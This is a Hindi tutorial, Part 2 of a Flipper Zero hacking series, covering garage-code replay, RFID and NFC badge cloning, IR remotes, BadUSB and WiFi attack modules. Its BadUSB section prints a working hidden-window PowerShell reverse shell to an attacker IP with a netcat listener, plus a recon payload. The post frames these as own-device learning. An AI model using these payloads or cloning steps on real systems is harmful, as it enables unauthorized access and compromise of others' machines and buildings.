The Hacker's Path: A 5-Part Series
Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Full Audit
Part 1 में, आपने शुरुआत की। आपने कुछ IR रिमोट क्लोन किए, कुछ NFC कार्ड स्कैन किए, sub-GHz स्पेक्ट्रम को लाइट अप होते देखा, और BadUSB से "Hello World" टाइप किया। आपने देखा कि सुरक्षा अक्सर एक भ्रम है।
अब हम गहराई में जाते हैं। इस लेख के अंत तक, आप हर उस प्रमुख प्रोटोकॉल को समझ जाएंगे जिनके साथ आपका Flipper Zero इंटरैक्ट कर सकता है, न केवल उन्हें कैसे इस्तेमाल करें, बल्कि क्यों वे इस तरह काम करते हैं और सुरक्षा के लिए इसका क्या मतलब है।
चेतावनी: आप यह जानने वाले हैं कि कई चीजें जिन्हें आपने सुरक्षित माना था... वे नहीं हैं।
Flipper का दर्शन
प्रोटोकॉल में जाने से पहले, सही मानसिकता स्थापित करते हैं। Flipper Zero हॉलीवुड के अर्थ में कोई "हैकिंग डिवाइस" नहीं है। यह एक सीखने का उपकरण है जो आपको रेडियो फ्रीक्वेंसी और हार्डवेयर प्रोटोकॉल के साथ इंटरैक्ट करने देता है जो सामान्य रूप से अदृश्य होते हैं।
इसे वायरलेस सिग्नल के लिए एक आवर्धक कांच (magnifying glass) समझें। सिग्नल हमेशा वहां थे। आप बस उन्हें देख नहीं पाते थे। अब आप देख सकते हैं।
यह अंतर मायने रखता है क्योंकि यह सुरक्षा के प्रति आपके दृष्टिकोण को बदलता है। अधिकांश "सुरक्षा" अस्पष्टता (obscurity) पर निर्भर करती है, यह मान्यता कि हमलावरों को पता नहीं होगा कि सिस्टम के साथ कैसे इंटरैक्ट करना है। आपका Flipper उस अस्पष्टता को हटा देता है। यह आपको दिखाता है कि वास्तव में क्या ट्रांसमिट और रिसीव हो रहा है। और जब आप इसे देख सकते हैं, तब आप मूल्यांकन कर सकते हैं कि वास्तविक सुरक्षा मौजूद है या नहीं।
स्पॉइलर: अक्सर, वास्तविक सुरक्षा मौजूद नहीं होती।
⚠️ याद रखें: केवल अपना सामान
इस लेख में सब कुछ आपके अपने डिवाइस, कार्ड और सिस्टम का परीक्षण करने के लिए है। ये तकनीकें किसी के भी सामान पर काम करती हैं, यही तो बात है। लेकिन जो सिस्टम आपके नहीं हैं उन पर इनका उपयोग करना गैरकानूनी है। अपनी सुरक्षा का परीक्षण करें। अपनी कमजोरियां खोजें। यही रास्ता है।
Sub-GHz: अदृश्य स्पेक्ट्रम
Sub-gigahertz रेडियो फ्रीक्वेंसी हर जगह हैं। आपका गैराज दरवाजा, कार की फोब, वेदर स्टेशन, वायरलेस डोरबेल, टायर प्रेशर सेंसर, स्मार्ट होम डिवाइस, ये सभी 1 GHz से नीचे के फ्रीक्वेंसी बैंड में लगातार ट्रांसमिट कर रहे हैं।
Sub-GHz क्यों? कम फ्रीक्वेंसी WiFi (2.4/5 GHz) जैसी उच्च फ्रीक्वेंसी की तुलना में आगे तक पहुंचती हैं और दीवारों को बेहतर तरीके से भेदती हैं। यह उन्हें उन डिवाइसों के लिए परफेक्ट बनाता है जिन्हें दूरी पर विश्वसनीय संचार की जरूरत होती है बिना लाइन-ऑफ-साइट की आवश्यकता के।
फ्रीक्वेंसी लैंडस्केप
नियमों के कारण विभिन्न क्षेत्र विभिन्न फ्रीक्वेंसी का उपयोग करते हैं:
- 315 MHz: उत्तरी अमेरिका, पुराने गैराज दरवाजे, कार फोब
- 390 MHz: उत्तरी अमेरिका, गैराज दरवाजे, कुछ ऑटोमोटिव
- 433.92 MHz: विश्वव्यापी, वेदर स्टेशन, सेंसर, यूरोपीय डिवाइस, कई IoT उत्पाद
- 868 MHz: यूरोप, स्मार्ट होम, LoRa, यूटिलिटी मीटर
- 915 MHz: अमेरिका, LoRa, स्मार्ट होम, इंडस्ट्रियल
Momentum फर्मवेयर के साथ, आपका Flipper आपकी भौतिक स्थिति की परवाह किए बिना इन सभी बैंड पर ट्रांसमिट और रिसीव कर सकता है। स्टॉक फर्मवेयर आपको आपके क्षेत्र की कानूनी फ्रीक्वेंसी तक सीमित रखता है। यह सीखने के लिए मायने रखता है, आपके पास "विदेशी" फ्रीक्वेंसी पर काम करने वाले डिवाइस हो सकते हैं।
प्रोजेक्ट: अपने गैराज दरवाजे का विश्लेषण
समय: 15 मिनट
आप क्या सीखेंगे: स्टैटिक कोड और रोलिंग कोड के बीच का अंतर, और यह क्यों मायने रखता है
चरण:
- Sub-GHz → Read पर नेविगेट करें
- अपने गैराज के पास खड़े रहें (इतना करीब नहीं कि दरवाजा खुल जाए)
- अपने गैराज दरवाजे का रिमोट बटन दबाएं
- Flipper को सिग्नल कैप्चर करते देखें
- जो कैप्चर हुआ उसकी जांच करें, पहचाने गए प्रोटोकॉल को देखें
आप क्या देख सकते हैं:
- Princeton, Linear, Chamberlain (पुराना): स्टैटिक कोड। हर बार एक ही कोड ट्रांसमिट होता है। रिप्ले अटैक के प्रति संवेदनशील।
- KeeLoq, Security+ 2.0, Rolling Code: रोलिंग कोड। प्रत्येक ट्रांसमिशन एक सिंक्रनाइज़्ड सीक्वेंस से अलग कोड का उपयोग करता है। इसे बस रिप्ले नहीं किया जा सकता।
हकीकत: अगर आपका गैराज दरवाजा स्टैटिक कोड का उपयोग करता है (2015 से पहले स्थापित कई ऐसा करते हैं), तो जो कोई भी उस सिग्नल को एक बार कैप्चर करता है, वह इसे हमेशा के लिए रिप्ले कर सकता है। आपका गैराज इस मान्यता से सुरक्षित है कि कोई सुन नहीं रहा। वह मान्यता अभी टूट गई।
रोलिंग कोड की व्याख्या
आधुनिक गैराज दरवाजे और कार की फोब रोलिंग कोड (जिन्हें हॉपिंग कोड भी कहते हैं) का उपयोग करते हैं। यहां बताया गया है कि वे कैसे काम करते हैं:
- ट्रांसमीटर (आपका रिमोट) और रिसीवर (आपका गैराज) दोनों एक गुप्त सीड और एल्गोरिदम साझा करते हैं
- हर बटन प्रेस एक सिंक्रनाइज़्ड सीक्वेंस में अगला कोड जनरेट करता है
- रिसीवर वर्तमान कोड या अगले ~256 कोड में से किसी को स्वीकार करता है (रेंज से बाहर बटन प्रेस को संभालने के लिए)
- एक बार कोड उपयोग हो जाने पर, यह हमेशा के लिए अमान्य हो जाता है
इसका मतलब है कि रोलिंग कोड सिग्नल को कैप्चर और रिप्ले करना काम नहीं करता, जब तक आप इसे रिप्ले करते हैं, कोड पहले ही अमान्य हो चुका होता है।
यह क्यों मायने रखता है
रोलिंग कोड इसलिए आविष्कार किए गए क्योंकि sub-GHz दुनिया ने पता लगाया कि अस्पष्टता द्वारा सुरक्षा विफल होती है। किसी ने सिग्नल कैप्चर और रिप्ले करने का तरीका खोज लिया, इसलिए इंडस्ट्री को वास्तविक क्रिप्टोग्राफिक सुरक्षा लागू करनी पड़ी। यह पैटर्न हर उस प्रोटोकॉल में दोहराया जाता है जिसकी हम चर्चा करेंगे: सुरक्षा तभी जोड़ी जाती है जब कोई कमजोरी प्रदर्शित करता है।
प्रोजेक्ट: वेदर स्टेशन डेटा कैप्चर
समय: 10 मिनट
आप क्या सीखेंगे: कितना डेटा बिना किसी सुरक्षा के प्रसारित होता है
चरण:
- Sub-GHz → Read पर नेविगेट करें
- किसी भी वायरलेस वेदर सेंसर (बाहरी थर्मामीटर, रेन गेज, आदि) के पास प्रतीक्षा करें
- अधिकांश हर 30-60 सेकंड में ट्रांसमिट करते हैं
- ट्रांसमिशन कैप्चर करें
- प्रोटोकॉल और किसी भी डिकोड किए गए डेटा को नोट करें
आप क्या पाएंगे: तापमान, आर्द्रता, बैटरी स्थिति, सेंसर ID, सब कुछ प्लेनटेक्स्ट में ट्रांसमिट होता है। कोई एन्क्रिप्शन नहीं, कोई ऑथेंटिकेशन नहीं। उस फ्रीक्वेंसी पर ट्यून किया हुआ कोई भी रिसीवर सारा डेटा प्राप्त करता है। अब सोचिए कि आपके आस-पड़ोस में और क्या ब्रॉडकास्ट हो रहा है...
RFID: 125kHz की दुनिया
लो-फ्रीक्वेंसी RFID (125kHz) पुरानी, सरल प्रॉक्सिमिटी कार्ड टेक्नोलॉजी है। आप इसे जिम मेंबरशिप कार्ड, पुराने ऑफिस बिल्डिंग एक्सेस कार्ड, पार्किंग गैराज, और अपार्टमेंट बिल्डिंग एंट्री सिस्टम में पाएंगे।
और यह सुरक्षा के लिए लगभग सार्वभौमिक रूप से भयानक है।
125kHz RFID कैसे काम करता है
ये कार्ड पैसिव हैं, इनमें कोई बैटरी नहीं है। जब आप एक को रीडर के पास रखते हैं, तो रीडर का इलेक्ट्रोमैग्नेटिक फील्ड कार्ड को पावर देता है, और कार्ड अपना ID नंबर ट्रांसमिट करता है। बस इतना ही। कोई चैलेंज-रिस्पॉन्स नहीं। कोई एन्क्रिप्शन नहीं। बस: "मैं कार्ड नंबर 12345 हूं।"
रीडर कहता है "ठीक है" और केवल उस ID नंबर को जानने के आधार पर एक्सेस देता है।
आप समस्या देख सकते हैं।
सामान्य 125kHz कार्ड प्रकार
- EM4100: बेहद सामान्य। बस एक 40-बिट ID प्रसारित करता है। शून्य सुरक्षा।
- HID Prox: सबसे सामान्य कॉर्पोरेट एक्सेस कार्ड। फैसिलिटी कोड + कार्ड नंबर प्रसारित करता है। शून्य सुरक्षा।
- Indala: कम सामान्य। अलग एनकोडिंग लेकिन वही समस्या, कोई सुरक्षा नहीं।
- AWID: एक और वैरिएंट। वही मूलभूत कमजोरी।
पैटर्न देखा? ये सभी कार्ड बस एक ID ब्रॉडकास्ट करते हैं। "सुरक्षा" यह है कि किसी को उस ID पढ़ने के लिए विशेष उपकरण की जरूरत होगी। आपका Flipper वह उपकरण है।
प्रोजेक्ट: अपना जिम कार्ड क्लोन करें
समय: 5 मिनट
आपको क्या चाहिए: आपका जिम/पूल/अपार्टमेंट 125kHz कार्ड, एक T5577 ब्लैंक कार्ड ($1-2 प्रत्येक)
चरण:
- 125 kHz RFID → Read पर नेविगेट करें
- अपना कार्ड Flipper की पीठ पर रखें (जहां RFID एंटीना है)
- सफल रीड की प्रतीक्षा करें, कार्ड प्रकार और ID नोट करें
- कार्ड को पहचानने योग्य नाम से सेव करें
- इम्यूलेशन टेस्ट करने के लिए: Saved → Select Card → Emulate
- Flipper को अपने जिम के रीडर पर रखें, यह आपके कार्ड की तरह ही काम करना चाहिए
T5577 ब्लैंक पर लिखने के लिए:
- अपने सेव किए गए कार्ड पर जाएं
- Write चुनें
- T5577 ब्लैंक कार्ड को Flipper पर रखें
- राइट कन्फर्मेशन की प्रतीक्षा करें
- अब आपके पास एक फिजिकल क्लोन है
यह क्यों मायने रखता है: उस एक्सेस कंट्रोल सिस्टम का पूरा सुरक्षा मॉडल अभी ध्वस्त हो गया। जो कोई भी आपके कार्ड के पास दो सेकंड के लिए आ सकता है, वह इसे क्लोन कर सकता है। अगली बार जब आप लॉकर रूम में अपना जिम बैग अनअटेंडेड छोड़ें तो इसके बारे में सोचिए।
T5577: आपका जादुई कार्ड
T5577 एक रीराइटेबल RFID कार्ड है जो अधिकांश 125kHz कार्ड प्रकारों का अनुकरण कर सकता है। यह एक्सेस कार्ड के लिए एक ब्लैंक CD-R जैसा है। आप कोई भी कार्ड डेटा इसमें लिख सकते हैं, और यह वह कार्ड बन जाता है।
परीक्षण के लिए 10 का पैक खरीदें। वे सस्ते हैं और यह समझने के लिए अविश्वसनीय रूप से उपयोगी हैं कि यह पूरी तकनीक कितनी कमजोर है। आप एक कार्ड डेटा लिख सकते हैं, उसका परीक्षण कर सकते हैं, फिर अलग कार्ड डेटा लिख सकते हैं, सब एक ही फिजिकल कार्ड पर।
यह क्या प्रकट करता है
125kHz RFID "सुरक्षा" शुद्ध नाटक है। ये सिस्टम मानते हैं कि आप कार्ड पढ़ नहीं सकते, डेटा कॉपी नहीं कर सकते, और इसे दूसरे कार्ड पर नहीं लिख सकते। उपभोक्ता उपकरणों के साथ तीनों मान्यताएं गलत हैं। अगर आपका कार्यस्थल HID Prox कार्ड (सबसे सामान्य कॉर्पोरेट एक्सेस कार्ड) का उपयोग करता है, तो Flipper वाला कोई भी कर्मचारी किसी भी अन्य कर्मचारी का एक्सेस क्लोन कर सकता है। इसे समझने दीजिए।
मुख्य निष्कर्ष
125kHz RFID सुरक्षा शुद्ध नाटक है। ये सिस्टम मानते हैं कि आप कार्ड डेटा पढ़, कॉपी या रीराइट नहीं कर सकते। $200 से कम लागत वाले उपभोक्ता उपकरणों के साथ तीनों मान्यताएं गलत हैं।
NFC: 13.56MHz की दुनिया
हाई-फ्रीक्वेंसी NFC (13.56 MHz) नई पीढ़ी है। यह कॉन्टैक्टलेस पेमेंट, आधुनिक एक्सेस कार्ड, ट्रांजिट सिस्टम, होटल की चाबियां, और आपके फोन के टैप-टू-पे को संचालित करती है।
अच्छी खबर: कुछ NFC कार्ड में वास्तव में असली सुरक्षा है।
बुरी खबर: कई में नहीं है।
NFC कार्ड प्रकार
- MIFARE Classic: एक्सेस कार्ड, ट्रांजिट, होटलों में बेहद सामान्य। प्रोप्राइटरी एन्क्रिप्शन का उपयोग करता है जो वर्षों पहले क्रैक हो गया था। कमजोर।
- MIFARE Ultralight: न्यूनतम सुरक्षा वाले साधारण कार्ड। अक्सर डिस्पोजेबल ट्रांजिट टिकट के लिए उपयोग किए जाते हैं।
- NTAG: ऑटोमेशन के लिए NFC टैग में सामान्य। आमतौर पर न्यूनतम सुरक्षा।
- MIFARE DESFire: वास्तव में सुरक्षित। AES एन्क्रिप्शन का उपयोग करता है। नई हाई-सिक्योरिटी तैनाती में उपयोग किया जाता है।
- EMV (पेमेंट कार्ड): आपका क्रेडिट कार्ड। मजबूत एन्क्रिप्शन, ट्रांजैक्शन लिमिट, और फ्रॉड डिटेक्शन है।
प्रोजेक्ट: अपने वर्क बैज का विश्लेषण
समय: 10 मिनट
आप क्या सीखेंगे: क्या आपके कार्यस्थल में असली सुरक्षा है या सुरक्षा का नाटक
चरण:
- NFC → Read पर नेविगेट करें
- अपना वर्क बैज Flipper की पीठ पर रखें
- रीड पूरा होने की प्रतीक्षा करें
- Flipper आपको क्या बताता है उसकी जांच करें
परिणामों की व्याख्या:
- MIFARE Classic 1K/4K: आपका बैज क्रैक किए हुए एन्क्रिप्शन का उपयोग करता है। समय और सही उपकरणों से इसे क्लोन किया जा सकता है।
- MIFARE Ultralight: न्यूनतम सुरक्षा। अक्सर क्लोन करने योग्य।
- MIFARE DESFire: वास्तव में सुरक्षित। आप सीमित डेटा देखेंगे।
- Unknown/Locked: प्रोप्राइटरी हो सकता है या DESFire। और जांच की जरूरत है।
वास्तविकता जांच: अधिकांश कॉर्पोरेट बैज अभी भी MIFARE Classic हैं। एन्क्रिप्शन 2008 में सार्वजनिक रूप से टूट गया था। अठारह साल पहले। अगर आपका बैज MIFARE Classic कहता है, तो आपका नियोक्ता एक ऐसा सुरक्षा सिस्टम चला रहा है जिसे क्रिप्टोग्राफर हास्यास्पद रूप से टूटा मानते हैं।
UID क्लोनिंग बनाम फुल क्लोनिंग
महत्वपूर्ण अंतर: Flipper हमेशा कार्ड का UID (Unique Identifier), यानी सीरियल नंबर, पढ़ और इम्यूलेट कर सकता है। कुछ एक्सेस सिस्टम केवल UID चेक करते हैं। इन सिस्टम के लिए, सरल इम्यूलेशन काम करता है।
बेहतर सिस्टम UID और कार्ड पर स्टोर किए गए एन्क्रिप्टेड डेटा दोनों की जांच करते हैं। इनके लिए, आपको एन्क्रिप्टेड सेक्टर भी क्लोन करने होंगे, MIFARE Classic के लिए संभव (एन्क्रिप्शन टूट चुका है) लेकिन DESFire के लिए नहीं।
प्रोजेक्ट: होटल की कार्ड का विश्लेषण
समय: 5 मिनट (अगली बार जब आप होटल में हों)
आप क्या सीखेंगे: होटल सुरक्षा वास्तव में कैसे काम करती है
चरण:
- अपना होटल कार्ड NFC → Read से पढ़ें
- कार्ड प्रकार नोट करें
- देखें कौन सा डेटा पठनीय है
आमतौर पर आप क्या पाएंगे: अधिकांश होटल की चाबियां MIFARE Ultralight या Classic हैं। कुछ पठनीय सेक्टर में रूम नंबर, चेक-आउट तारीख, या अन्य मेटाडेटा दिखाती हैं। "सुरक्षा" यह है कि मेहमानों के पास आमतौर पर NFC रीडर नहीं होते। अब आपके पास है।
NFC के लिए मैजिक कार्ड
125kHz के लिए T5577 की तरह, 13.56MHz के लिए "मैजिक" NFC कार्ड हैं:
- Gen1 (UID Changeable): कस्टम UID लिख सकते हैं। कुछ रीडर द्वारा "मैजिक" के रूप में पहचाना जाता है।
- Gen2 (CUID): बेहतर कम्पैटिबिलिटी। पावर साइकल के बाद भी UID बदलाव बने रहते हैं।
- Gen3 (UFUID): लिखने के बाद UID लॉक कर सकते हैं, सामान्य कार्ड जैसा दिखता है।
- Gen4 (Ultimate Magic): सबसे लचीला। कई कार्ड प्रकारों का अनुकरण कर सकता है।
सीखने के लिए, Gen2 कार्ड सही संतुलन हैं, सस्ते, व्यापक रूप से कम्पैटिबल, और अधिकांश परीक्षण के लिए पर्याप्त।
इन्फ्रारेड: पूर्ण नियंत्रण
आपने Part 1 में पहले ही IR रिमोट बनाए। चलिए गहराई में जाते हैं।
अल्टीमेट रिमोट लाइब्रेरी बनाना
Flipper असीमित IR रिमोट स्टोर कर सकता है। लेकिन हर बटन को अलग-अलग सीखना थकाऊ है। बेहतर तरीका: कम्युनिटी डेटाबेस का उपयोग करें।
Momentum फर्मवेयर में IRDB शामिल है, पहले से कैप्चर किए गए रिमोट का एक विशाल डेटाबेस। आप GitHub रिपॉजिटरी से भी रिमोट डाउनलोड कर सकते हैं और उन्हें अपने Flipper के SD कार्ड में जोड़ सकते हैं।
प्रोजेक्ट: अपना IR शस्त्रागार बनाएं
समय: 20 मिनट
चरण:
- अपने Flipper पर: Infrared → Universal Remotes
- आपको TVs, ACs, प्रोजेक्टर आदि के लिए पहले से बने यूनिवर्सल रिमोट मिलेंगे
- इन्हें अपने डिवाइसों के खिलाफ टेस्ट करें
- जो डिवाइस कवर नहीं हुए, उनके लिए Learn New Remote उपयोग करें
- सेव किए गए रिमोट को कमरे या डिवाइस प्रकार के अनुसार व्यवस्थित करें
पावर मूव: "रूम रिमोट" बनाएं जो एक ही स्थान के सभी IR डिवाइसों को जोड़ता है। एक फाइल TV, साउंडबार, लाइट्स, और AC कंट्रोल करती है।
आप क्या सीखते हैं: IR सार्वभौमिक और असुरक्षित है। IR रिसीवर वाले किसी भी डिवाइस को IR ट्रांसमीटर वाले किसी भी डिवाइस द्वारा नियंत्रित किया जा सकता है। यह जानबूझकर है, IR को सुविधा के लिए डिज़ाइन किया गया था, सुरक्षा के लिए नहीं। आपका Flipper बस उस सुविधा को सार्वभौमिक बना देता है।
रॉ IR कैप्चर
कुछ डिवाइस गैर-मानक IR प्रोटोकॉल का उपयोग करते हैं। इनके लिए, Flipper रॉ सिग्नल कैप्चर कर सकता है, ऑन/ऑफ पल्स की सटीक टाइमिंग, और इसे पूरी तरह रिप्ले कर सकता है।
जब मानक लर्निंग किसी सिग्नल को नहीं पहचानती तो Infrared → Learn New → Raw पर नेविगेट करें।
BadUSB: Rubber Ducky का विकल्प
Part 1 में, आपने Flipper से "Hello World" टाइप कराया। अब हम गंभीर होते हैं।
BadUSB (जिसे USB Rubber Ducky अटैक भी कहते हैं) कंप्यूटरों द्वारा USB डिवाइसों को संभालने के तरीके में एक मूलभूत दोष का शोषण करता है: वे कीबोर्ड पर बिना शर्त भरोसा करते हैं। जब आप कोई डिवाइस प्लग करते हैं जो कीबोर्ड होने का दावा करता है, तो कंप्यूटर बिना सवाल किए हर कीस्ट्रोक स्वीकार करता है।
आपका Flipper लगभग 1,000 कैरेक्टर प्रति सेकंड टाइप कर सकता है। किसी भी इंसान से तेज। कोई प्रतिक्रिया करे उससे पहले जटिल अटैक चलाने के लिए काफी तेज।
DuckyScript मूलभूत बातें
BadUSB पेलोड DuckyScript का उपयोग करते हैं, एक सरल स्क्रिप्टिंग भाषा। मुख्य कमांड:
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEप्रोजेक्ट: सिस्टम इनफॉर्मेशन ग्रैबर
समय: 15 मिनट
यह क्या करता है: PowerShell खोलता है, सिस्टम इन्फो इकट्ठा करता है, एक फाइल में सेव करता है (आपकी अपनी मशीन पर)
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERआप क्या सीखते हैं: 3 सेकंड से कम की भौतिक पहुंच में, एक हमलावर hostname, username, domain, IP एड्रेस, और OS वर्शन एकत्र कर सकता है। यह रिकॉनिसेंस है। कल्पना करें कि उन 3 सेकंड में और क्या टाइप किया जा सकता है।
प्रोजेक्ट: रिवर्स शेल सेटअप
समय: 30 मिनट (Kali सेटअप सहित)
यह क्या करता है: आपकी Kali मशीन से वापस कनेक्शन बनाता है (Part 3 की तैयारी)
पूर्वापेक्षाएं: Kali Linux चल रहा हो (VM ठीक है), अपना Kali IP एड्रेस जानें
Kali पर, लिसनर शुरू करें:
nc -lvnp 4444
BadUSB पेलोड (Windows टारगेट):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTERक्या होता है: टारगेट मशीन आपकी Kali मशीन से वापस PowerShell कनेक्शन खोलती है। अब आपके पास उस मशीन पर कमांड-लाइन एक्सेस है। यह है कि कैसे भौतिक पहुंच + BadUSB = पूर्ण समझौता (complete compromise)। हम Part 3 में इसे और खोजेंगे।
⚠️ ये पेलोड असली हैं
ऊपर दिया गया रिवर्स शेल पेलोड वास्तव में काम करता है। इसे केवल अपनी मशीनों पर परीक्षण के लिए उपयोग करें। इसे किसी और की मशीन पर चलाना संघीय अपराध है (अनधिकृत पहुंच + बैकडोर की स्थापना)। उद्देश्य खतरे को समझना है, खतरा पैदा करना नहीं।
प्रदर्शन के लिए मजेदार पेलोड
दूसरों को BadUSB प्रदर्शित करने के लिए (उनकी मशीन पर अनुमति के साथ), यहां कुछ हानिरहित लेकिन प्रभावशाली पेलोड हैं:
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: हार्डवेयर विस्तार
Flipper के GPIO (General Purpose Input/Output) पिन आपको बाहरी मॉड्यूल कनेक्ट करने और क्षमताओं का विस्तार करने देते हैं। यहीं पर Flipper एक हैंडहेल्ड टूल से एक डेवलपमेंट प्लेटफॉर्म में बदल जाता है।
आवश्यक मॉड्यूल
- WiFi Dev Board: WiFi क्षमताएं जोड़ता है, पैकेट कैप्चर, deauth टेस्टिंग, evil twin अटैक। Part 3 से आगे के लिए आवश्यक।
- CC1101 External Antenna: Sub-GHz रेंज को नाटकीय रूप से बढ़ाता है। इंटरनल एंटीना काम करता है, लेकिन गंभीर काम के लिए बाहरी बेहतर है।
- ESP32 Marauder: Flipper को WiFi/Bluetooth हैकिंग प्लेटफॉर्म में बदल देता है। हैंडशेक कैप्चर करता है, अटैक चलाता है।
- ProtoBoard: कस्टम प्रोजेक्ट और अपना हार्डवेयर कनेक्ट करने के लिए।
प्रोजेक्ट: WiFi Dev Board सेटअप
समय: 20 मिनट
आपको क्या चाहिए: WiFi Dev Board (ऑफिशियल या कम्पैटिबल ESP32)
चरण:
- ESP32 पर Marauder फर्मवेयर फ्लैश करें (निर्देश github.com/justcallmekoko/ESP32Marauder पर)
- Flipper के GPIO पिन से कनेक्ट करें
- GPIO → ESP32 → Marauder पर नेविगेट करें
- अब आपके पास WiFi स्कैनिंग, deauth, और पैकेट कैप्चर है
यह क्यों मायने रखता है: Flipper अकेले WiFi नहीं कर सकता, इसमें सही रेडियो हार्डवेयर नहीं है। लेकिन dev board के साथ, आप नेटवर्क स्कैन कर सकते हैं, WPA हैंडशेक कैप्चर कर सकते हैं, और WiFi अटैक कर सकते हैं। हम Parts 3 और 4 में इसका व्यापक उपयोग करेंगे।
उन्नत Momentum फीचर्स
अगर आप Momentum फर्मवेयर चला रहे हैं (आपको चलाना चाहिए), तो यहां खोजने लायक फीचर्स हैं:
- Desktop Animations: पूरी तरह कॉस्मेटिक, लेकिन मजेदार। कम्युनिटी एनिमेशन पैक देखें।
- Extended Protocols: Momentum स्टॉक फर्मवेयर में शामिल न होने वाले प्रोटोकॉल का समर्थन जोड़ता है।
- Application Hub: स्टॉक से परे अतिरिक्त ऐप्स, गेम, टूल्स, विशेष यूटिलिटी।
- Custom Asset Packs: पूरे लुक और फील को बदलें।
असली मूल्य अनलॉक की गई फ्रीक्वेंसी और विस्तारित प्रोटोकॉल सपोर्ट में है। स्टॉक फर्मवेयर जानबूझकर कानूनी/नियामक अनुपालन के लिए सीमित है। Momentum मानता है कि आप एक वयस्क हैं जो नियम समझते हैं।
आपने क्या मास्टर किया
अब आप समझते हैं:
- Sub-GHz: गैराज दरवाजे, कार फोब, और सेंसर कैसे संवाद करते हैं, और रोलिंग कोड क्यों मायने रखते हैं
- 125kHz RFID: जिम कार्ड और पुराने एक्सेस बैज तुच्छ रूप से क्लोन करने योग्य क्यों हैं
- 13.56MHz NFC: टूटे एन्क्रिप्शन (MIFARE Classic) और असली सुरक्षा (DESFire) के बीच का अंतर
- इन्फ्रारेड: यूनिवर्सल रिमोट लाइब्रेरी कैसे बनाएं और रॉ सिग्नल कैसे कैप्चर करें
- BadUSB: USB HID ट्रस्ट क्यों एक मूलभूत कमजोरी है, और इसका शोषण कैसे करें
- GPIO: WiFi, विस्तारित रेंज, और कस्टम हार्डवेयर में कैसे विस्तार करें
आपका Flipper अब एक हथियार है। लेकिन Kali Linux की तुलना में यह एक पेचकस है, जो एक पूरी वर्कशॉप है। असली हैकिंग वातावरण को बूट करने का समय आ गया है।
The Hacker's Path
एक 5-भाग श्रृंखला जो आपको जिज्ञासु से सक्षम बनाती है।
Part 1: Introduction Part 2: Flipper Mastery ✓ Part 3: Kali Fundamentals Part 4: Exploitation Part 5: Full Audit
Part 2 चेकलिस्ट
☐ Sub-GHz: गैराज दरवाजे का विश्लेषण किया, रोलिंग बनाम स्टैटिक कोड समझे
☐ 125kHz RFID: कार्ड पढ़े, कम से कम एक क्लोन का परीक्षण किया
☐ NFC: वर्क बैज का विश्लेषण किया, कार्ड प्रकार पहचाना
☐ इन्फ्रारेड: पूरी होम रिमोट लाइब्रेरी बनाई
☐ BadUSB: सिस्टम इन्फो पेलोड का परीक्षण किया, रिवर्स शेल समझा
☐ GPIO: WiFi dev board Part 3 के लिए तैयार
☐ मैजिक कार्ड: परीक्षण के लिए T5577 और/या NFC मैजिक कार्ड प्राप्त किए
आगे क्या
Part 3 में, हम Flipper की केंद्रित क्षमताओं को छोड़कर पूर्ण पेनिट्रेशन टेस्टिंग वातावरण में प्रवेश करते हैं: Kali Linux।
आप सीखेंगे:
- अपनी हैकिंग प्रयोगशाला की स्थापना (VM इंस्टॉलेशन और कॉन्फ़िगरेशन)
- nmap के साथ नेटवर्क रिकॉनिसेंस, अपने नेटवर्क पर हर डिवाइस की मैपिंग
- वायरलेस रिकॉनिसेंस, aircrack-ng के साथ WiFi हैंडशेक कैप्चर करना
- वेब रिकॉनिसेंस, आपका राउटर क्या एक्सपोज करता है यह खोजना
- Flipper कैप्चर को Kali वर्कफ्लो से जोड़ना
Flipper ने आपको दिखाया कि कमजोरियां मौजूद हैं। Kali आपको समझने में मदद करता है कि वे कितनी गहरी हैं।
Part 3 में मिलते हैं।